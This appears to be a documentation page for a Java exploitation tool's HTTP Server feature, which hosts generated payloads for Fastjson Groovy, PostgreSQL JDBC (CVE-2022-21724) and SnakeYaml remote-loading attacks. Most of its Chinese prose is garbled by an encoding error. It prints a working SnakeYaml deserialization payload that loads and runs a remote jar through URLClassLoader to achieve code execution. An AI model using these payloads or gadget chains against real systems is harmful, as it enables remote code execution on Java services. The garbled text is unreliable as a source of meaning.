--- sidebar_position: 6 --- # HTTP Server 一个简å•çš„HTTP Server,å¯ä»¥å°†ç”Ÿæˆçš„ Payload 挂载到HTTP端å£ä¸Šï¼Œæ–¹ä¾¿æŸäº› HTTP URL çš„å连场景。 ## Fastjson Groovy è¿œç¨‹åŠ è½½ Gadgetå:`GroovyJarConvert` 使用 HTTP Server 并开å¯å¯¹åº” HTTP 端å£ï¼Œé€‰æ‹© OtherPayload 在级è”选择器ä¸å‹¾é€‰ GroovyJarConvertï¼Œæ¤ Gadget 会将å—节ç 处ç†ä¸º Groovy Jar Payload æ ¼å¼ï¼Œä¹Ÿå°±æ˜¯Jar包,然åŽé€šè¿‡ HTTP Server 挂在到一个 HTTP 端å£ä¸Šï¼Œç‚¹å‡»ç”ŸæˆåŽä¼šç”Ÿæˆä¸€ä¸ª HTTP 链接,放到 fastjson groovy payload ä¸å³å¯ä½¿ç”¨  ## PostgreSQL JDBC 的利用 å¯é€‰çš„ Gadget: - `SpringBeanXmlClassLoader` - `SpringBeanXmlExec` - `SpringBeanXmlSpEL` PostgreSQL (CVE-2022-21724) é…åˆ SpringBean è¿œç¨‹åŠ è½½XML文件,执行å—节ç 并回显   om/LandGrey/spring-boot-upload-file-lead-to-rce-tricks ## SnakeYaml Jar è¿œç¨‹åŠ è½½ Gadget å:`SnakeyamlJarConvert` 生æˆè¿‡ç¨‹ä¸Žä¸Šé¢ç±»ä¼¼ï¼Œä¸å†è¿‡å¤šé˜è¿° 通常é…åˆå¦‚下 SnakeYaml Payloadï¼Œå®žçŽ°è¿œç¨‹åŠ è½½ RCE ```yaml !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [ [ !!java.net.URL [ "http://127.0.0.1:7777/yaml-payload.jar" ] ] ] ] ``` å‚考: - https://tttang.com/archive/1815/#toc_snakeyaml_1 - https://github.com/artsploit/yaml-payload